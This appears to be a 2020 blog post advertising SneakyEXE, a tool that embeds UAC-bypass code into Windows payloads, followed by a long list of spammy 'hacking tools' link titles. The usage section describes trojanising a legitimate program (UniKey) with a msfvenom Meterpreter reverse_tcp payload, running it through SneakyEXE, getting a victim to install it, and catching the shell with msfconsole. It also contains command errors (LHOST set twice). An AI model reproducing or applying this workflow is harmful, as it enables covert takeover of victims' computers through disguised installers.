Tuesday, August 25, 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related news


  1. Hacking Tools Free Download
  2. Hacking Tools Download
  3. Hacker Tools Linux
  4. Hacking Tools Usb
  5. Hack Tools For Windows
  6. Pentest Recon Tools
  7. Pentest Tools For Android
  8. What Are Hacking Tools
  9. Pentest Tools Linux
  10. Hacker Tools Windows
  11. Pentest Tools Nmap
  12. Easy Hack Tools
  13. Nsa Hacker Tools
  14. Hacker
  15. Black Hat Hacker Tools
  16. Hack Apps
  17. Pentest Tools List
  18. Hacker Tools List
  19. Hack Tool Apk
  20. Hacking Tools For Windows 7
  21. Hacker Tools Hardware
  22. Ethical Hacker Tools
  23. Hacking Tools Mac
  24. Hack Tool Apk No Root
  25. Wifi Hacker Tools For Windows
  26. Hacker Tools Apk Download
  27. Hacking Tools Name
  28. Hacking Tools Free Download
  29. Hack Tools
  30. Pentest Recon Tools
  31. Hacking Tools Name
  32. Wifi Hacker Tools For Windows
  33. Kik Hack Tools
  34. Hacking Tools Github
  35. Wifi Hacker Tools For Windows
  36. Hacker
  37. Install Pentest Tools Ubuntu
  38. Pentest Tools
  39. Hack Tools Github
  40. Hacking Tools For Kali Linux
  41. Tools Used For Hacking
  42. Pentest Tools Open Source
  43. Pentest Box Tools Download
  44. Pentest Tools For Windows
  45. Pentest Tools Subdomain
  46. What Are Hacking Tools
  47. Pentest Tools For Windows
  48. Hacking Tools Windows
  49. Hacker Tools Github
  50. Hacker Tools Hardware
  51. Hacker Tools 2019
  52. Hacker Tools Windows
  53. World No 1 Hacker Software
  54. Hacking Tools Download
  55. Hacking Tools Online
  56. Tools 4 Hack
  57. Nsa Hack Tools
  58. Hacking Tools For Games
  59. Game Hacking
  60. Hacking Tools For Windows 7
  61. Hacking Tools Online
  62. Top Pentest Tools
  63. Nsa Hack Tools Download
  64. Hacking Tools Windows
  65. Hacker Tools Windows
  66. Hak5 Tools
  67. Hack Website Online Tool
  68. Install Pentest Tools Ubuntu
  69. Hacking Tools 2020
  70. Hack Tools For Games
  71. Pentest Tools Github
  72. Github Hacking Tools
  73. Hack Tools Pc
  74. Pentest Tools Website
  75. Hack Tools 2019
  76. Hacker Tools List
  77. Hack Tools For Ubuntu
  78. Pentest Tools For Ubuntu
  79. Hacking Tools Windows
  80. Hack Tool Apk
  81. Hack Tools
  82. Hacker Tools 2020
  83. What Is Hacking Tools
  84. Hacking Tools Windows 10
  85. Hack Tools Pc
  86. Hacker Tool Kit
  87. How To Hack
  88. Hack Tools Pc
  89. Wifi Hacker Tools For Windows
  90. New Hacker Tools
  91. Hacker Tool Kit
  92. Hacker Tools List
  93. Hackers Toolbox
  94. Usb Pentest Tools
  95. Physical Pentest Tools
  96. Hack Tools Download
  97. Pentest Tools
  98. Tools For Hacker
  99. Pentest Tools Android
  100. Hacker Tools List
  101. Pentest Tools Linux
  102. Pentest Tools Apk

No comments:

Post a Comment